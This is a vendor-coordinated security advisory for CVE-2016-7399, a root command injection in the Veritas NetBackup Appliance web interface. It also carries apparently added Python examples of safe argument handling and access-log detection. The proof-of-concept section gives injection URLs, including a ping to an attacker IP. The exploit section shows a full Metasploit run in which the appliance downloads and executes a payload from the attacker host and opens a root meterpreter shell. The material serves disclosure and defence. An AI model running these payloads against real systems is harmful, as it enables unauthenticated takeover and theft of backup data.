Veritas NetBackup Appliance Unauthenticated Remote Command Execution

Sec-1 Security Advisory
Severity : High
Advisory Name : Veritas NetBackup Appliance Unauthenticated Remote Command Execution
Discovery Date : 17/05/2016
Release Date : 04/10/2016
Application : NetBackup Appliance versions 2.6.0.1 through to v2.7.3, and the v3.0 series
Platform : Linux
CVE : CVE-2016-7399
CVSSv3 Base Score : 10.0
CVSSv3 Vector : AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:O/RC:C
Discovered by : Matthew Hall
Vendor Status : Emergency Engineering Binaries (EEBs) are available to fix this vulnerability on the following Encap releases of the NetBackup appliances: version 2.6.0.4, 2.6.1.2 and 2.7.3.
See https://www.veritas.com/support/en_US/article.000116055 for more information.
Veritas are aware that the issue is present in the current version of the product. A fix is scheduled for the NetBackup Appliances v3.0 release.
References : https://www.sec-1.com/blog
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7399
https://www.veritas.com/content/support/en_US/security/VTS16-002.html
https://www.veritas.com/support/en_US/article.000116055
https://nvd.nist.gov/vuln/detail/CVE-2016-7399

Vulnerability Summary

Unauthenticated Remote Command Execution

Description:
“Command injection is an attack in which the goal is execution of arbitrary commands on the host operating system via a vulnerable application. Command injection attacks are possible when an application passes unsafe user supplied data (forms, cookies, HTTP headers etc.) to a system shell. In this attack, the attacker-supplied operating system commands are usually executed with the privileges of the vulnerable application. Command injection attacks are possible largely due to insufficient input validation.” (Source: OWASP).

“The software constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.” (Source: CWE-78)

Exploit

One instance was identified where an unauthenticated attacker could gain RCE on the underlying RedHat Linux operating system through the NetBackup Web Management Interface at the following URL:

    https://<appliance_ip_address>/appliancews/getLicense?hostName=<argument>

The GET parameter “hostName” is controlled by the user and is ultimately used as an argument in a system call to a Perl script located at /opt/NBUAppliance/scripts/license.pl.

It is possible to utilise backticks, semi-colon, ampersand and pipe characters, and the bash subshell construct “$()”, to execute commands on the underlying operating system as the user which calls the license.pl script (root in this case).
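The root cause described above is the shell-string pattern: a request parameter is interpolated into a command line that a shell then parses. The fix has two parts, an allow-list check on the value before it reaches any command, and passing it as its own argv element so no shell ever sees it. The Python below is an added example written for this advisory, not code from the appliance, from Veritas or from Sec-1. It uses echo as a harmless stand-in for license.pl (the script path is the one quoted above, but its real argument handling is not documented here), and the RFC 1123 host-name pattern is an assumed allow-list:

```python
import re
import subprocess
from typing import List

# Path quoted in the advisory; the script's real interface is not documented there, so this
# example never invokes it and uses echo as a stand-in.
LICENSE_SCRIPT = "/opt/NBUAppliance/scripts/license.pl"

# Assumed allow-list: an RFC 1123 host name, i.e. dot-separated labels of letters, digits and
# hyphens, no label starting or ending with a hyphen, at most 63 characters per label and 253 overall.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME_RE = re.compile(rf"^{_LABEL}(?:\.{_LABEL})*$")


def is_valid_hostname(value: str) -> bool:
    """Allow-list check: only a syntactically valid host name gets anywhere near a command."""
    return bool(value) and len(value) <= 253 and _HOSTNAME_RE.fullmatch(value) is not None


def license_argv(hostname: str) -> List[str]:
    """Hardened construction: validate first, then build an argv list that is run without a shell."""
    if not is_valid_hostname(hostname):
        raise ValueError(f"rejected hostName parameter: {hostname!r}")
    return ["perl", LICENSE_SCRIPT, hostname]


def shell_string_demo(value: str) -> str:
    """Vulnerable pattern: the value is pasted into a command line handed to /bin/sh, so the
    shell expands metacharacters such as $( ). echo stands in for license.pl so the effect
    is visible and harmless."""
    proc = subprocess.run(["/bin/sh", "-c", f"echo {value}"], capture_output=True, text=True)
    return proc.stdout.strip()


def argv_demo(value: str) -> str:
    """Hardened pattern: the same value passed as one argv element reaches the program verbatim;
    nothing interprets the metacharacters."""
    proc = subprocess.run(["echo", value], capture_output=True, text=True)
    return proc.stdout.strip()


if __name__ == "__main__":
    probe = "$(echo expanded)"
    print("shell string :", shell_string_demo(probe))  # the shell performs the substitution
    print("argv list    :", argv_demo(probe))          # delivered as a literal string
    print("allow-list   :", is_valid_hostname(probe), is_valid_hostname("backup01.corp.example"))
```

Either measure alone blocks this class of injection; both together also protect the script itself, which cannot be handed a value containing spaces or a leading hyphen that it might misread as an extra option.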

As this vulnerability allows an unauthenticated attacker to gain root level privileges on the affected device, the effects could include:

  • Recovering sensitive data from system backups
  • Stealing cached credentials/password hashes from virtual machines backed up to the device
  • Enrolling the system into a botnet
  • Installation of a rootkit/backdoor for remote persistence into an internal network

Example Payload/POC

The RCE is “blind” – that is, the response from the server does not include the results of executed commands; as such, the following proof of concept can be used.

Calling the following URL will result in the server response being delayed by six seconds:

    https://<appliance_ip_address>/appliancews/getLicense?hostName=$(sleep%206)

Testing for command execution can also be performed using out-of-band techniques such as “ping” or “nslookup”, e.g.:

    https://<appliance_ip_address>/appliancews/getLicense?hostName=$(ping%20<attackers_IP_address>%20-c2)

Performing a network capture on the attacker's IP address should show the server sending two ICMP echo requests.
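From the defender's side, the blind probes described in this section leave a trace in the web server's access log: a getLicense request whose hostName value carries shell metacharacters, or whitespace that would add arguments to the command line. The Python below is an added example, not part of the advisory or of any Veritas tooling. The log lines are constructed in the common Apache/NCSA format, which is an assumption about how the appliance logs requests, and the client addresses and 203.0.113.7 are placeholders:

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache/NCSA common format, an assumption about the
# appliance's logging). Only the request target matters to the check below.
SAMPLE_LOG = """\
10.0.0.5 - - [17/May/2016:12:30:01 +0100] "GET /appliancews/getLicense?hostName=backup01.corp.example HTTP/1.1" 200 512
10.0.0.9 - - [17/May/2016:12:31:44 +0100] "GET /appliancews/getLicense?hostName=$(sleep%206) HTTP/1.1" 200 512
10.0.0.9 - - [17/May/2016:12:32:10 +0100] "GET /appliancews/getLicense?hostName=x;ping%20203.0.113.7%20-c2 HTTP/1.1" 200 512
10.0.0.9 - - [17/May/2016:12:33:05 +0100] "GET /appliancews/getLicense?hostName=%60id%60 HTTP/1.1" 200 512
10.0.0.12 - - [17/May/2016:12:34:00 +0100] "GET /appliancews/getLicense?hostName=a%7cb HTTP/1.1" 200 512
10.0.0.5 - - [17/May/2016:12:35:00 +0100] "GET /appliancews/status?x=1 HTTP/1.1" 200 10
"""

_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*"'
)
_ENDPOINT = "/appliancews/getLicense"   # the vulnerable URL from the advisory
_PARAM = "hostName"                     # the injectable GET parameter
# The shell metacharacters the advisory names (backtick, ';', '&', '|', '$(') plus a newline.
_META_RE = re.compile(r"[;&|`\n]|\$\(")


def query_params(target: str) -> dict:
    """Split a request target into percent-decoded query parameters. Done by hand so that a ';'
    inside a value survives (older parse_qs versions treat it as a pair separator)."""
    params = {}
    _, _, query = target.partition("?")
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params[unquote(name)] = unquote(value)
    return params


def scan_access_log(text: str) -> list:
    """Return one finding per getLicense request whose hostName value contains shell
    metacharacters or whitespace; everything else (other endpoints, clean host names) is skipped."""
    findings = []
    for line in text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue
        target = m.group("target")
        if target.partition("?")[0] != _ENDPOINT:
            continue
        value = query_params(target).get(_PARAM, "")
        reasons = []
        if _META_RE.search(value):
            reasons.append("shell metacharacter")
        if re.search(r"\s", value):
            reasons.append("whitespace")
        if reasons:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "value": value, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['ip']} hostName={f['value']!r} -> {', '.join(f['reasons'])}")
```

The check decodes the parameter before matching so that encoded forms such as %60 (backtick) and %7c (pipe) are caught, and it flags whitespace separately because a value with spaces but no metacharacters still adds arguments to the command line. Pair hits with the outbound ICMP or DNS traffic the advisory describes, and with the request latency of a sleep probe, to confirm a real attempt.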

Exploit Example

A fully working exploit has been created for this issue for use within the Metasploit Framework. An example of its use is shown below.

This module is available at the following URL until its incorporation into the Metasploit Framework – GitHub

msf > use exploit/linux/http/veritas_netbackup_exec
msf exploit(veritas_netbackup_exec) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf exploit(veritas_netbackup_exec) > set RHOST 192.168.114.10
RHOST => 192.168.114.10
msf exploit(veritas_netbackup_exec) > set RPORT 443
RPORT => 443
msf exploit(veritas_netbackup_exec) > set SSL true
SSL => true
msf exploit(veritas_netbackup_exec) > info

Name: Veritas NetBackup Appliance Web Console OS Command Injection
Module: exploit/linux/http/veritas_netbackup_exec
Platform: Linux, Unix
Privileged: Yes
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2016-05-17

Provided by:
Matthew Hall

Available targets:
  Id  Name
  --  ----
  0   CMD
  1   Linux Payload

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  DOWNFILE                     no        Filename to download, (default: random)
  DOWNHOST                     no        An alternative host to request the payload from
  HTTP_DELAY  60               yes       Time that the HTTP Server will wait for the ELF payload request
  Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST       192.168.114.10   yes       The target address
  RPORT       443              yes       The target port
  SRVHOST     192.168.114.254  yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT     8080             yes       The local port to listen on.
  SSL         true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                      no        The URI to use for this exploit (default is random)
  VHOST                        no        HTTP server virtual host

Payload information:

Description:
The Veritas NetBackup Appliance is vulnerable to an unauthenticated
OS Command Injection Vulnerability via arguments passed to backend
perl scripts when performing license verification. Since it is a
blind os command injection vulnerability, there is no output for the
executed command when using the cmd generic payload. This module was
tested against a Veritas NetBackup Appliance Version 2.7.2. A ping
command against a controlled system could be used for testing
purposes. The exploit uses the wget client from the device to
convert the command injection into an arbitrary payload execution.

msf exploit(veritas_netbackup_exec) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.114.254:4444
msf exploit(veritas_netbackup_exec) > [*] 192.168.114.10:443 - Starting up our web service on http://192.168.114.254:8080/lKYbcvGEQ ...
[*] Using URL: http://192.168.114.254:8080/lKYbcvGEQ
[*] 192.168.114.10:443 - Asking the Veritas device to download http://192.168.114.254:8080/lKYbcvGEQ
[*] 192.168.114.10:443 - Sending Command /usr/bin/wget%20http://192.168.114.254:8080/lKYbcvGEQ%20-O%20/tmp/hbtoqwqc
[*] 192.168.114.10:443 - Sending the payload to the server...
[*] 192.168.114.10:443 - Waiting for the victim to request the ELF payload...
[*] 192.168.114.10:443 - Asking the Veritas device to chmod lKYbcvGEQ
[*] 192.168.114.10:443 - Sending Command chmod%20777%20/tmp/hbtoqwqc
[*] 192.168.114.10:443 - Asking the Veritas device to execute lKYbcvGEQ
[*] 192.168.114.10:443 - Sending Command /tmp/hbtoqwqc
[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
[*] Sending stage (1495599 bytes) to 192.168.114.10
[*] Meterpreter session 1 opened (192.168.114.254:4444 -> 192.168.114.10:33662) at 2016-05-17 12:36:28 +0100
[+] Deleted /tmp/hbtoqwqc

msf exploit(veritas_netbackup_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0, suid=0, sgid=0
meterpreter > sysinfo
Computer : .site
OS : Linux .site 2.6.32-504.30.3.el6.x86_64 #1 SMP Thu Jul 9 15:20:47 EDT 2015 (x86_64)
Architecture : x86_64
Meterpreter : x86/linux
meterpreter >

meterpreter > ls
Listing: /opt/SYMCnbappws
=========================

Mode              Size      Type  Last modified              Name
----              ----      ----  -------------              ----
40700/rwx------   4096      dir   2016-04-27 12:57:23 +0100  Security
40775/rwxrwxr-x   4096      dir   2016-04-27 12:56:14 +0100  XSD
100664/rw-rw-r--  7548948   fil   2016-01-20 12:48:40 +0000  appliancews.war
40775/rwxrwxr-x   4096      dir   2016-04-27 13:30:51 +0100  bin
40775/rwxrwxr-x   4096      dir   2016-04-30 15:40:17 +0100  config
40775/rwxrwxr-x   4096      dir   2016-04-27 12:56:15 +0100  docs
40775/rwxrwxr-x   4096      dir   2016-04-27 12:57:25 +0100  eat
40755/rwxr-xr-x   4096      dir   2016-04-27 12:29:49 +0100  jre
40775/rwxrwxr-x   4096      dir   2016-04-27 12:56:21 +0100  lib
40775/rwxrwxr-x   4096      dir   2016-04-27 12:56:21 +0100  resources
100755/rwxr-xr-x  12223204  fil   2016-01-20 13:06:50 +0000  server-2.7.2.war
100664/rw-rw-r--  9722862   fil   2016-01-20 12:48:40 +0000  symhelp.war
40775/rwxrwxr-x   4096      dir   2016-04-27 12:56:22 +0100  webserver

meterpreter > pwd
/opt/SYMCnbappws

Vendor Response

As of versions 2.6.0.4, 2.6.1.2 and 2.7.3 this vulnerability has been reported as fixed. Veritas are aware that the issue is present in the current version of the product. A fix has been scheduled for the NetBackup Appliances v3.0 release.
Sec-1 would like to thank Veritas for their very professional and prompt responses in dealing with this matter.
